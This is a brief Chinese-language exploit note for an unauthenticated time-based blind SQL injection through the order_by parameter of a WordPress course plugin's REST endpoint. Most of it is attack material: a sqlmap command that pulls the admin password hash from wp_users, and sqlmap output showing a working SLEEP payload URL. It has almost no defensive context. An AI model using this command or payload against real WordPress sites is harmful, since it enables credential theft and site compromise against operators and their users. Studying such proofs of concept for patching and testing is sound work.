基于时间的SQL注入
描述 该插件在使用order_by参数之前未对其进行正确的清理和转义,导致存在SQL注入漏洞,未认证用户可利用该漏洞
保存GET请求
sqlmap -r ~/sqli.req -p order_by --technique=T --sql-query = 'select user_pass from wp_users where id = 1'
sqlmap从存储的会话中恢复了以下注入点:
参数: #1* (URI) 类型: 基于时间的盲注 标题: MySQL >= 5.0.12 AND 基于时间的盲注(查询SLEEP) 载荷: https://VULNERABLEWORDPRESS/wp-json/lp/v1/courses/archive-course?c_search=test&order_by=ID AND (SELECT 7508 FROM (SELECT(SLEEP(5)))VVvd)&order=DESC&limit=10&return_type=html